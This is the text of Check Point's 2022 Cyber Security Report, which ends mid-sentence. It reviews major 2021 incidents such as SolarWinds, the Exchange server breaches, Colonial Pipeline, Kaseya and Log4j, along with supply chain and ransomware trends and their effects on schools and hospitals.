Report | Cyber Security 2022
The 2022 Cyber Security Report gives a detailed overview of the cyber threat landscape and recommendations on how to prevent the next cyber pandemic.

2CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
Y O U D E S E R V E T H E B E S T S E C U R I T Y
3CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
CHAPTER 1: INTRODUCTION TO THE CHECK POINT 2022 SECURIT Y REPORT
CHAPTER 2: T IMELINE OF 2021'S MA JOR CYBER E VENTS
CHAPTER 3: 2021’S CYBER SECURIT Y TRENDS 13 From SolarWinds to Log4j
17 The Fallout of Cyber Attacks
21 Cloud Services Under Attack
25 Mobile Arena Developments
28 Cracks in the Ransomware Ecosystem
CHAPTER 4: MALWARE SPOTLIGHT: EMOTE T’S RE TURN
CHAPTER 5: GLOBAL STATISTICS 41 Global Malware Statistics
43 Global Analysis of Top Malware
45 Botnet Global Analysis
47 Infostealer Malware Global Analysis
49 Cryptominers Global Analysis
51 Banking Trojans Global Analysis
53 Mobile Malware Global Analysis
C O N T E N T S
05
07 12
31 34
4CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
CHAPTER 6: HIGH PROFILE GLOBAL V ULNER ABIL IT IES 55 ‘Log4Shell’ Apache Log4j—Remote Code Execution
(CVE-2021-44228)
56 ‘ProxyLogon’ Microsoft Exchange Server - Authentication Bypass (CVE-2021-26855)
56 Atlassian Confluence - Remote Code Execution (CVE-2021-26084)
CHAPTER 7: PRE VENTING THE NE X T CYBER PANDEMIC— A STR ATEGY FOR ACHIE V ING BE T TER SECURIT Y
60 Threat prevention—prevent attacks before they happen
60 When your perimeter is everywhere and attacks keep advancing, your business needs accurate prevention based on real time threat intelligence
61 Secure everything, as everything is a potential target
61 Leveraging a complete unified architecture
62 Maintain security hygiene
64 Conclusion
APPENDIX: MALWARE FAMILY DESCRIPTIONS
54
59
65
5CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 5CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
01 C H A P T E R 1
INTRODUCTION TO THE CHECK POINT 2022 SECURITY REPORT
01
THE PAST TWELVE MONTHS REPRESENTS ONE OF THE MOST TURBULENT AND DISRUPTIVE PERIODS ON RECORD, AT LEAST AS FAR AS SECURITY IS CONCERNED.
6CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 6CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
M A Y A H O R O W I T Z VP Research, Check Point
The past twelve months represents one of the most turbulent and disruptive periods
on record, at least as far as security is concerned. As governments and businesses
around the world continued to navigate the uncharted waters of a global pandemic,
the so-called “new normal” still felt a long way off. Digital transformation efforts
were dramatically accelerated as businesses embraced hybrid and remote working
arrangements, but the same questions around security maturity that plagued many
businesses in 2020 persisted through 2021. While some of those questions remain
up in the air, threat actors have wasted no time whatsoever in turning the situation
to their advantage. Cyberattacks are up by an average of 50% since we issued our
last annual report, with the education and research sector suffering the biggest
blow, averaging 1,605 attacks every single week throughout the year. As predicted,
the infamous SolarWinds breach appears to have kickstarted a trend of supply chain
attacks that have persisted throughout the year, showing no signs of slowing down.
In this 2022 Security Report, we will reveal the key attack vectors and techniques
that our researchers here at Check Point Software have observed over the past year.
From a new generation of highly sophisticated supply chain attack methods, right
through to the Log4j vulnerability exploit that rendered hundreds of thousands of
businesses open to a potential breach.
We’ll start with a month-by-month rundown of the year’s major cyber events, before
doing a deep dive into some of the emerging trends that will undoubtedly shape the
year to come. We’ll discuss cloud services, developments in the mobile landscape
and IoT, cracks in the ransomware ecosystem, the return of Emotet, and, of course,
the Log4J zero-day vulnerability that punctuated an already busy year.
C H A P T E R 1
7CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 7CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
C H A P T E R 2
02 TIMELINE OF 2021'S MAJOR CYBER EVENTS
IN 2021, WE WITNESSED AN UNUSUALLY HIGH NUMBER OF ATTACKS THAT LED TO DISRUPTIONS TO INDIVIDUALS’ DAY-TO-DAY LIVES, AND IN SOME CASES EVEN THREATENED THEIR SENSE OF PHYSICAL SECURITY.
8CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
In January, the US Department of Justice confirmed that it had been affected by the Solarwinds supply-chain attack, and that 3% of its employee email boxes had been accessed in order to steal sensitive data. The department has more than 100,000 employees across a series of law enforcement agencies, including the FBI, the Drug Enforcement Agency, and the US Marshals Service. The Department of Justice was a buyer of SolarWinds Orion, a tool that was used by hackers to execute this attack, leading to as many as 18,000 SolarWinds customers experiencing a breach. The Department of Justice said it learned it was a victim on Christmas Eve, revealing that a small percentage of its Microsoft Office 365 email accounts had been compromised.
In February, popular music streaming platform, Spotify, was hit by a credential-stuffing attack, only three months after experiencing a similar incident. The attack used stolen credentials from 100,000 user accounts and leveraged a malicious Spotify login database. The attack was reported to Spotify, which prompted the company to issue a password reset to affected users that rendered the stolen credentials invalid. The company said in a statement that it also worked to have the fraudulent database taken down by its internet service provider, and noted that the attack was not linked to a breach in Spotify's own security. Cybercriminals carrying out credential-stuffing exploit people who reuse the same passwords across multiple online accounts and platforms. Attackers simply build automated scripts that systematically try stolen IDs and passwords against various types of accounts.
On March 2nd, 2021, Volexity reported the in-the-wild exploitation of the Microsoft Exchange Server vulnerabilities, CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065. Further investigation uncovered that an attacker was exploiting a zero-day used in the wild. The attacker was using the vulnerability to steal the full contents of several user mailboxes. This vulnerability is remotely exploitable and does not require authentication, special knowledge or access to a specific environment. It was estimated that 250,000 servers fell victim to the attacks, including servers belonging to around 30,000 organizations in the United States and 7,000 servers in the United Kingdom. The European Banking Authority, the Norwegian Parliament, and Chile's Commission for the Financial Market (CMF) were also impacted.
01 JAN
03 MAR
02 FEB
https://www.theguardian.com/technology/2021/jan/06/doj-email-systems-solarwinds-hackers https://www.darkreading.com/attacks-breaches/spotify-hit-with-another-credential-stuffing-attack/d/d-id/1340083 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065 https://www.checkpoint.com/latest-cyber-attacks/microsoft-exchange-hack/ https://www.forbes.com/sites/daveywinder/2021/03/09/eu-banking-authority-hacked-as-microsoft-exchange-attacks-continue/ https://www.forbes.com/sites/daveywinder/2021/03/09/eu-banking-authority-hacked-as-microsoft-exchange-attacks-continue/ https://www.forbes.com/sites/daveywinder/2021/03/09/eu-banking-authority-hacked-as-microsoft-exchange-attacks-continue/?sh=20c0b9f2fe06 https://www.reuters.com/article/us-norway-cyber-idUSKBN2B21TX https://www.bleepingcomputer.com/news/security/chiles-bank-regulator-shares-iocs-after-microsoft-exchange-hack/ https://www.bleepingcomputer.com/news/security/chiles-bank-regulator-shares-iocs-after-microsoft-exchange-hack/
9CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
In April, the US National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI) published a joint advisory warning that a Russia-linked APT group, APT29, was exploiting five vulnerabilities in an ongoing attack against US targets. According to the advisory, Russian Foreign Intelligence Service (SVR) actors (also known as APT29, Cozy Bear, and The Dukes) frequently used publicly known vulnerabilities to conduct widespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials to allow further access. Recent Russian SVR activities include compromising SolarWinds Orion software updates, targeting COVID-19 research facilities through deploying WellMess malware, and leveraging a VMware vulnerability that was a zero-day at the time.
In May, a ransomware attack shut down the routine operations of Colonial Pipeline, which carries 45% of the fuel consumed in the US East Coast, including diesel, petrol and jet fuel. The alleged Russian DarkSide ransomware criminal group, was behind the attack. Colonial Pipeline is the largest refined products pipeline in the US, a 5,500 mile (8,851 km) system involved in transporting over 100 million gallons from the Texas city of Houston to New York Harbor. DarkSide uses Ransomware-as-a-Service (RaaS) model, where it relies on affiliate program to execute its cyber attacks. Colonial Pipeline paid a ransom demand of close to US$ 5 million in return for a decryption key. Later on, the FBI declared it had retrieved the private key of the ransom account and recovered 63.7 of the bitcoins paid.
JBS, the US-based meat processing giant, was hit by a ransomware attack in June affecting its North American and Australian operations. The FBI attributed the attack to the REvil ransomware group. The attack forced JBS to temporarily shut down all of its beef plants in the United States. One of its Canadian plants was also affected, and the company paused beef and lamb kills in Australia until the plants were back online. On June 9, JBL’s Chief Executive in the US revealed the company had paid US$ 11 million to hackers in a “very painful but necessary decision”, despite the fact that the company was able to restore most of its systems from its own backups.
04 APR
06 JUN
05 MAY
https://www.fbi.gov/news/pressrel/press-releases/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabilities-to-compromise-us-and-allied-networks https://www.nytimes.com/2021/05/08/us/politics/cyberattack-colonial-pipeline.html https://www.bloomberg.com/news/articles/2021-05-13/colonial-pipeline-paid-hackers-nearly-5-million-in-ransom https://www.zdnet.com/article/fbi-attributes-jbs-ransomware-attack-to-revil/ https://www.bloomberg.com/news/articles/2021-05-31/meat-is-latest-cyber-victim-as-hackers-hit-top-supplier-jbs
10CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
In July, the REvil ransomware group targeted multiple Managed Service Providers (MSPs) and their customers in a supply chain attack. Threat actors successfully implanted a malicious software update for IT Company Kaseya’s VSA patch management and client monitoring tool, which included the malware installer. An estimated 1,000 companies were impacted by the attack. The massive supply chain attack carried out by REvil over the 4th of July weekend impacted numerous Kaseya customers with millions of USD demanded in ransom. Kaseya issued a security advisory on their site, warning all customers to immediately shut down their VSA server to prevent the spread of the attack while they investigated. In order to breach on-premise Kaseya VSA servers, REvil used a zero-day vulnerability that was in the process of being fixed. The vulnerability had been previously disclosed to Kaseya by security researchers from the Dutch Institute for Vulnerability Disclosure (DIVD), and Kaseya was validating the patch before rolling it out to customers. However, the REvil ransomware gang was one step ahead of Kaseya and used the vulnerability to carry out their attack, with ransoms ranging from US$ 45K to US$ 5 million. With the attack on Kaseya VSA servers, REvil’s affiliate was initially targeting Kaseya’s MSSP’s, with a clear intent to propagate to the MSSP customers. The attack amplified exponentially from the MSSP to the actual customers.
The largest ever distributed denial of service (DDoS) attack was detected in August, with 17.2 million requests-per-second. The attack was facilitated by the Mirai botnet, targeting an organization in the financial industry. In this specific incident, the traffic originated from more than 20,000 bots in 125 countries worldwide, with almost 15% of the attack originating from Indonesia, followed by India, Brazil, Vietnam, and Ukraine. Mirai was first observed in 2016 targeting Internet of Things (IoT) devices, such as CCTV cameras and routers. Numerous variants of the botnet have emerged since, expanding the list of targeted devices to include Linux routers and servers, Android devices, and more.
Check Point Research saw a global surge in the black market for fake COVID-19 vaccine certificates on Telegram, following US President Biden’s vaccine mandate announcements. The black market expanded to serve 28 countries, including Austria, UAE, Brazil, UK, Singapore and more. The price for fake vaccine certificates also jumped globally, including in the US, where it doubled from US$ 100 to US$ 200.
09 SEP
08 AUG
07 JUL
https://thehackernews.com/2021/07/kaseya-revil-ransomware-attack.html http://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689 https://thehackernews.com/2021/08/cloudflare-mitigated-one-of-largest.html https://www.securityweek.com/mirai-botnet-infects-devices-164-countries https://blog.checkpoint.com/2021/09/14/amid-vaccine-mandates-fake-vaccine-certificates-become-a-full-blown-industry/
11CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
In October, the infrastructure of the Russia-based REvil ransomware gang, responsible for numerous ransomware attacks, was compromised and forcibly taken-down for the second time in three months, bringing their operation to a halt. This comes after REvil’s leaks website “Happy Blog” was previously shut down in July (along with the suspicious disappearance of one of REvil gang leaders “UNKN”), and after it was brought back up again during September, by one of its remaining gang leaders. REvil ransomware became notorious during 2021 with a series devastating attacks, especially after their successful ransom of the JBS food company, for US$ 11 million, and their later compromise of Kaseya - a US software management company, in July. These increasingly devastating attacks were matched by an increased pressure from authorities, and the launch of an offensive attack against REvil’s infrastructure and its members.
On November 14, Emotet, one of the most infamous botnets in history, rose from the dead after it was taken down ten months earlier, by a joint international law enforcement operation. Emotet used the Trickbot botnet to jump-start its operation, when machines already infected with the Trickbot Trojan, started to download and execute the latest version of Emotet. Emotet itself came back even stronger than before, with some new additions to its toolbox, such as an updated encryption scheme, control-flow obfuscations and new delivery methods.
On December 9th, an acute remote code execution (RCE) vulnerability was reported in the Apache logging package Log4j 2 versions 2.14.1 and below (CVE-2021-44228). Apache Log4j is the most popular java logging library with over 400,000 downloads from its GitHub project. It is used by a vast number of companies worldwide, enabling logging in a wide set of popular applications. Exploiting this vulnerability is simple. The Log4j library is embedded in almost every internet service or application we are familiar with, including Twitter, Amazon, Microsoft, Minecraft and more. Since the outbreak, Check Point Research witnessed what looks like an evolutionary repression, with new variations of the original exploit being introduced rapidly - over 60 in less than 24 hours. This was clearly one of the most serious vulnerabilities on the internet in recent years.
10 OCT
12 DEC
11 NOV
https://techcrunch.com/2021/10/18/revil-ransomware-group-goes-dark-after-its-tor-sites-were-hijacked/?guccounter=1 https://www.zdnet.com/article/revil-websites-down-after-governments-pressured-to-take-action-following-kaseya-attack/ https://www.bleepingcomputer.com/news/security/jbs-paid-11-million-to-revil-ransomware-225m-first-demanded/ https://www.zdnet.com/article/updated-kaseya-ransomware-attack-faq-what-we-know-now/ https://www.europol.europa.eu/media-press/newsroom/news/world%E2%80%99s-most-dangerous-malware-emotet-disrupted-through-global-action https://research.checkpoint.com/2021/when-old-friends-meet-again-why-emotet-chose-trickbot-for-rebirth/ https://research.checkpoint.com/2021/the-laconic-log4shell-faq/ https://blog.checkpoint.com/2021/12/11/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1/
12CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
C H A P T E R 3
2021’S CYBER SECURITY TRENDS
03
THROUGHOUT 2021, SOFTWARE SUPPLY CHAIN ATTACKS GREW IN BOTH FREQUENCY AND SCALE. RESEARCHERS CONCLUDED THAT SOFTWARE SUPPLY-CHAIN ATTACKS INCREASED BY NO LESS THAN 650% THROUGHOUT THE YEAR.
13CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
FROM SOLARWINDS TO LOG4J The infamous SolarWinds supply chain attack was revealed in December 2020, but its influence
on the cloud attack landscape, with particular regard to supply chain attacks, has led to its
inclusion in our report once again. The SolarWinds incident originated with a sophisticated
malware, Sunburst, incorporated into several compromised versions of an IT resource
management product named SolarWinds Orion, used by 33,000 customers worldwide. The
malicious update, attributed to the Russian Intelligence agency-affiliated threat group called
‘Nobelium’, found its way to around 18,000 corporations, successfully infecting approximately
425 companies on the Fortune 500 list, as well as US government departments including the
Department of Homeland Security and the Treasury Department.
L O T E M F I N K E L S T E E N Director,
Threat Intelligence & Research
C H A P T E R 3
The SolarWinds attack was very much a milestone moment for the security community, not just because of the scale of the attack, but because the technique that was used revealed new levels of sophistication that increased the threat of supply chain attacks more generally. The SolarWinds breach set a new tone and, as predicted, we’ve seen the number of software supply- chain incidents grow in its wake. This past year, we’ve seen the number of incidents increase six-fold, and there are yet again signs that businesses aren’t prepared to deal with the threat.”
https://research.checkpoint.com/2021/solarwinds-explained/ https://krebsonsecurity.com/2020/12/solarwinds-hack-could-affect-18k-customers/ https://research.checkpoint.com/2021/deep-into-the-sunburst-attack/ https://fortune.com/2020/12/15/solarwinds-hackers-u-s-agencies/ https://www.businessinsider.com/solarwinds-hack-explained-government-agencies-cyber-security-2020-12
14CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 14CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
Naturally, prominent APT groups are an integral
part of the trend. The North Korean Lazarus
group recently began targeting IT service
providers to launch supply chain attacks,
and a new backdoor called BLINDINGCAN
has already been used to target a Latvian IT
vendor and a South Korean software company.
Additional incidents include an attack against
a CCTV vendor carried out by an affiliate of the
DarkSide ransomware gang, in which the actors
compromised the vendor’s website to infect its
clients with ransomware.
One of the most significant supply chain
attacks of 2021, also featuring ransomware
delivery, targeted Kaseya, a global provider of
IT management software for managed service
providers (MSPs) and IT teams. The attack
was carried out by a member of the affiliates
program of the REvil ransomware group.
According to the Kaseya CEO, less than 0.1% of
the company’s customers were accessed, but as
some of Kaseya’s clients are MSPs themselves,
as many as 1,500 companies were affected
by the attack. The threat actors cleverly
exploited a vulnerability affecting Kaseya’s
internet-facing VSA servers. VSA is a remote-
monitoring tool commonly used by MSPs for the
management of network and endpoint devices.
When the attack was discovered by Kaseya, the
company urged its customers to shut down their
VSA servers.
As detailed in our previous report, beyond
its unprecedented scale, SolarWinds’ main
innovation lies in its technique. In order to gain
access to an organization’s sensitive Microsoft
365 resources, the attackers first used a forged
token to compromise the local and on-premise
networks, before moving laterally to the cloud
environment. Today, we can clearly state that
the SolarWinds attack laid the foundations for a
rapid surge in supply chain attacks.
Throughout 2021, software supply chain attacks
grew in both frequency and scale. Researchers
concluded that software supply-chain attacks
increased by no less than 650% throughout
the year. A study issued by the European Union
Agency for Cybersecurity (ENISA) reviewed
two dozen incidents and found that 66% of
supply chain attacks were committed by
exploiting an unknown vulnerability, while only
16% leveraged known software flaws. Most
attacks actually targeted software code. This
year, it seems that organizations were once
again caught largely unprepared, as a survey
concluded that 82% of companies designate the
third party vendors that make up their software
supply chain with highly privileged roles. 76%
provide roles that could allow account takeover,
and, worst of all, over 90% of designated security
teams were not aware that such permissions
were even granted.
C H A P T E R 3
https://www.darkreading.com/threat-intelligence/north-korea-s-lazarus-group-turns-to-supply-chain-attacks https://securityaffairs.co/wordpress/119051/cyber-crime/unc2465-supply-chain-attack.html https://www.cisa.gov/uscert/kaseya-ransomware-attack https://www.zdnet.com/article/updated-kaseya-ransomware-attack-faq-what-we-know-now/ https://www.cisa.gov/uscert/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689-Important-Notice-July-2nd-2021 https://www.cisecurity.org/solarwinds/ https://venturebeat.com/2021/09/15/next-gen-software-supply-chain-attacks-up-650-in-2021/ https://portswigger.net/daily-swig/four-fold-increase-in-software-supply-chain-attacks-predicted-in-2021-report https:// https://www.wiz.io/blog/82-of-companies-unknowingly-give-3rd-parties-access-to-all-their-cloud-data
15CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 15CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
This year, the group behind the SolarWinds
attack itself resumed activity, utilizing the
approach developed for the first attack and
focusing yet again on companies that are part
of the global IT supply chain. However, this
time, a different part of the chain is being
targeted, namely cloud resellers and tech
service providers. These companies customize,
implement, and manage cloud services for their
customers. The threat group clearly relies on
these companies’ direct access to their clients’
environments to obtain access to their full
client lists in a single strike, impersonating a
trusted partner. The operation has been taking
place since May 2021 and has already impacted
more than 140 resellers and providers,
compromising 14 of them. Throughout the
second half of the year, the ‘Nobelium’ threat
group has been highly active, but with a lower
success rate due to growing awareness. The
group utilizes multiple tactics, including the
use of stolen credentials obtained via an
info-stealer campaign by a third-party actor,
leveraging application impersonation privileges
to collect protected mail data, and abuse multi-
factor authentication (MFA). The recent attack
wave may signal a growth in the resources
invested by the Russian state-sponsored group
in the field of supply chain operations, as a
means to establish persistent access to targets
of interest to the Russian government.
In late October, the popular NPM package ‘ua-
parser-js’, with millions of weekly downloads,
was compromised by attackers. For a period
of four hours, the actors managed to take over
the developer’s NPM account and inserted
malicious code into three versions of the NPM
library. The library, which is used to parse
user agent strings and identify its browser,
operating system, CPU and more, is used in
thousands of projects, including ones owned
by Facebook, Microsoft, Amazon, Google and
Slack. Therefore, the supply chain attack, in
which compromised packages of the library
were distributed instead of the legitimate one,
enabled threat actors to install malware on a
large number of infected devices. In this case,
Linux and Windows devices were infected with
crypto-miners and password-stealers.
Another prominent incident took place in
November, when multiple Greek shipping
companies were hit by ransomware. This was
after a common IT service provider, Danaos
Management Consultants, was compromised in
a supply chain attack. The incident crippled the
shipping companies’ communication channels,
interrupting contact with other ships, suppliers,
and agents, and also led to data loss.
C H A P T E R 3
https://blogs.microsoft.com/on-the-issues/2021/10/24/new-activity-from-russian-actor-nobelium/ https://www.mandiant.com/resources/russian-targeting-gov-business https://www.mandiant.com/resources/russian-targeting-gov-business https://www.bleepingcomputer.com/news/security/popular-npm-library-hijacked-to-install-password-stealers-miners/ https://www.rapid7.com/blog/post/2021/10/25/npm-library-ua-parser-js-hijacked-what-you-need-to-know/ https://blog.sonatype.com/npm-project-used-by-millions-hijacked-in-supply-chain-attack https://www.maritime-executive.com/article/cyberattack-hits-multiple-greek-shipping-firms https://min.news/en/world/29d72504d76e21799a28f00dcd24012f.html
16CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 16CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
Due to the scale of the distribution of the
library, Log4Shell is referred to as the most
critical vulnerability of 2021, with the full scope
of the damage yet to be determined. The Apache
Foundation released a patch for the RCE
vulnerability, but nevertheless, mass scanning
of vulnerable servers has been observed by
multiple security vendors. The exploit rate of
the Log4j flaw has been unusually high since
shortly after its exposure. Check Point
Research detected approximately 40,000 attack
attempts 2 hours after the Log4j vulnerability
was revealed and 830,000 attack attempts 72
hours into the event.
The vulnerability could potentially allow
threat actors to access any system using the
library, including systems that are used to
manage client networks and resources. The
potential damage that could be caused by this
one vulnerability in an open source library
demonstrates the immense risk posed by
software supply chains, especially in cases
where an underfunded project, run by several
part-time volunteers, is a key component that
thousands of multi-million computer systems
rely on worldwide.
Just when we thought we had finished
summarizing the Supply Chain landscape for
2021, the Log4j zero-day vulnerability was
exposed. The Apache logging package Log4j is
the most popular Java logging library with over
400,000 daily downloads, and is incorporated
into millions of Java-based applications
worldwide. Companies using Log4j as a logging
package include Cisco, Twitter, Cloudflare,
Tesla, Amazon, Apple and more. The Log4j
package logs error messages; according to the
Apache Foundation advisory, an attacker who
can control log messages or their parameters
could execute arbitrary code from an external
server via multiple protocols when message
lookup substitution is enabled. Only a single
string of text is needed to exploit the flaw.
Since its discovery on December 9, the
‘Log4Shell’ flaw, has been actively exploited in
the wild. The vulnerability, assigned CVE-2021-
44228, could allow an unauthenticated attacker
to execute malicious code or take over any
system that uses the vulnerable version of an
open-source library. Unsurprisingly, it scored a
perfect 10 out of 10 in the CVSS rating system.
C H A P T E R 3
https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html https://logging.apache.org/log4j/2.x/security.html https://www.bitdefender.com/blog/labs/bitdefender-honeypots-signal-active-log4shell-0-day-attacks-underway-patch-immediately/ https://blog.checkpoint.com/2021/12/13/the-numbers-behind-a-cyber-pandemic-detailed-dive/ https://blog.checkpoint.com/2021/12/11/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1/ https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html https://logging.apache.org/log4j/2.x/security.html https://twitter.com/DTCERT/status/1469258597930614787
17CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 17CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
O M E R D E M B I N S K Y Group Manager,
Data Research
THE FALLOUT OF CYBER ATTACKS It’s no secret that a cyberattack, whether targeted or widely distributed, can have a dramatic
impact on organizational performance, data integrity, customer success, long-term reputation
and, of course, finances. Naturally, attacks targeting critical infrastructure can paralyze an
organization’s routine as well as its entire supply chain. In 2021, we witnessed an unusually high
number of attacks that led to disruptions to individuals’ day-to-day lives, and in some cases
even threatened their sense of physical security. Whether they are financially or ideologically
driven, threat actors are constantly looking for additional leverage and new ways to increase
the pressure placed on their victims.
C H A P T E R 3
As outlined in our mid-year report, incidents of cyberattacks are increasing across the board as threat actors take advantage of changing circumstances and hurried digital transformation efforts. As of this report, Cyberattacks are up by an average of 50% when compared with last year's data, but the education and research sectors appear to have suffered the greatest blow, weathering an average of 1,605 attacks on a weekly basis.”
18CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 18CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
the FBI to investigate. In Australia, some
abattoirs were completely shut down, forcing
the company to furlough 7,000 employees.
Eventually, with the fear of price inflation
combined with massive unemployment, the CEO
of JBS USA, a subsidiary of JBS S.A., announced
that the company paid the cybercriminals a
ransom equivalent to US$ 11 million in BTC.
The education sector was also heavily impacted.
In 2021, it was the most targeted sector
globally, with a 75% increase compared to 2020
and an average of almost 1,605 attack weekly
attempts per organization. The disruption
suffered by educational institutions impacted
students, professors and other staff members.
Howard University in Washington D.C fell victim
to a ransomware attack in September and
was forced to suspend classes to conduct a
thorough investigation of their network together
with an audit of the student and staff devices.
Similarly, The Lewis and Clark Community
College in Illinois was hit by a ransomware
attack in November that affected their online
learning platform as well as other critical
systems. They had to close all their campuses,
and cancel extra-curricular activities including
sporting events taking place in their facilities.
The FBI released an alert against the PYSA
ransomware that targets higher education
institutions in the US and the UK.
One of this year’s most significant attacks,
which perfectly demonstrates the above, is a
ransomware incident that took place in May. The
operation targeted the Colonial Pipeline fuel
company which delivers fuel to the Southeast
coast of the United States. The incident forced
the company to shut down their operations,
increasing gasoline prices and causing a major
supply shortage on the East Coast. This chain
of events eventually triggered a rush of panic
buying as many gas stations completely ran
out of fuel. Government officials pleaded with
the public not to rush to gas stations, as people
were actually attempting to fill plastic bags with
gasoline to avoid running out. A single day after
the attack took place, Colonial Pipeline had no
choice but to pay the US$ 5 million ransom to
the DarkSide ransomware gang who led the
attack in order to unlock their systems.
In the same month, JBS S.A, the world’s largest
meat processing company, fell victim to an
attack by the REvil ransomware group. The
Brazilian company distributes meat products
made in 150 industrial plants in 15 countries,
and has approximately 150,000 employees
worldwide. The attack that hit the company
network impacted slaughterhouses and meat
supplies in the US, Canada and Australia and
caused more than 3000 workers’ shifts to be
canceled. All of its US beef plants and meat
packing facilities, responsible for almost a
quarter of American meat supplies, ceased
production while The White House assigned
C H A P T E R 3
https://www.reuters.com/technology/jbs-paid-11-mln-response-ransomware-attack-2021-06-09/ https://blog.checkpoint.com/2021/10/06/as-battle-against-cybercrime-continues-during-cybersecurity-awareness-month-check-point-research-reports-40-increase-in-cyberattacks/ https://www.washingtonpost.com/education/2021/09/08/howard-university-ransomware-cyberattack/ https://www.thetelegraph.com/news/article/Lewis-Clark-remains-offline-after-cyber-attack-16657042.php https://www.cisa.gov/sites/default/files/publications/PYSA Flash.pdf https://www.zdnet.com/article/colonial-pipeline-ransomware-attack-everything-you-need-to-know/ https://www.nytimes.com/2021/05/08/us/politics/cyberattack-colonial-pipeline.html https://www.usatoday.com/story/news/nation/2021/05/12/colonial-pipeline-cyberattack-anxiety-gasoline-panic-buying/5059184001/ https://gov.georgia.gov/press-releases/2021-05-11/gov-kemp-signs-executive-order-temporarily-suspend-gas-tax-georgia https://www.cnbc.com/2021/06/08/colonial-pipeline-ceo-testifies-on-first-hours-of-ransomware-attack.html https://www.bbc.com/news/world-us-canada-57318965 https://www.newsweek.com/russia-linked-cyber-attack-jbs-meats-hits-7000-jobs-1596713 https://www.bloomberg.com/news/articles/2021-05-31/meat-is-latest-cyber-victim-as-hackers-hit-top-supplier-jbs
19CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 19CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
Israel, with a custom ransomware. The attack
incapacitated computers and some of the
hospital infrastructure, making discharging
and processing patients impossible due to the
inability to retrieve patient files and register
new ones. In December, the Behavioral Health
Group (BHG), which maintains over 80 Opioid
treatment clinics throughout the US, suffered
a cyber-attack that disrupted its network for a
week. In some centers, patients were prevented
from getting their prescribed take-home
dosage of medicine to treat narcotic addiction
as the computers were not available to print
prescription labels, potentially harming their
sensitive anti-addiction treatment.
Ideologically driven hackers also managed to
cause public disruption, particularly in Iran.
First, the Iranian railways infrastructure faced
a cyberattack back in July in which hackers
displayed messages about train delays or
cancellations on information boards at stations
across the country, urging passengers to
call a number (which belonged to the Iranian
Supreme Leader Ayatollah Khamenei’s office)
for more information. The attack severely
disrupted train operations the same day
and spread fear and confusion among the
public. Check Point Research investigated
and attributed the attack to the Indra group
which opposes the regime and has been active
since at least 2019, known for its use of wiper
malware.
Finally, in mid-2021, the Grief ransomware
attacked several school districts in the US,
among them a school district in Mississippi.
The ransomware stole 10GB of data including
personal and professional information, and
has threatened to publish the data unless it is
paid. Institutions of higher learning such as
universities and colleges make good targets for
cyber-criminals because their systems, which
allow students and faculty to connect their
personal devices to the institution’s network,
aren’t fully protected.
The healthcare sector has also been heavily
targeted by cybercriminals since the start of
the pandemic, as hospitals, research facilities
involved in the development of vaccines,
and pharmaceutical companies all prove
tempting targets due to the time-sensitive
nature of their work. In October, a devastating
ransomware attack took place against the
healthcare system of Newfoundland and
Labrador, Canada. As a result, employee and
patient data was stolen and key systems were
taken down for more than a week, leading
to a delay in thousands of appointments,
including chemotherapy, as almost all non-
emergency services and procedures were
canceled within the province. That same month,
we witnessed one of the first ransomware
attacks against a hospital in the Middle East,
as the Chinese group DeepBlueMagic targeted
the Hillel Yaffe Medical Center in Hadera,
C H A P T E R 3
https://www.ynetnews.com/business/article/bjc1ddesk https://www.bleepingcomputer.com/news/security/cyberattack-on-bhg-opioid-treatment-network-disrupts-patient-care/ https://www.nytimes.com/2021/08/14/world/middleeast/iran-trains-cyberattack.html https://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/ https://mississippitoday.org/2021/06/11/school-district-ransomware-attack-mississippi/ https://blog.checkpoint.com/2021/01/05/attacks-targeting-healthcare-organizations-spike-globally-as-covid-19-cases-rise-again/ https://www.cbc.ca/news/canada/newfoundland-labrador/nl-cyber-attack-worst-canada-1.6236210
20CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 20CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
In October, a massive cyber-attack disrupted
4,300 Iranian gas stations, targeting the
electronic cards system which allows people
to buy gas with government subsidies. On the
screen, consumers who tried to fill their tank
found the notice “cyberattack 64411”, Iran’s
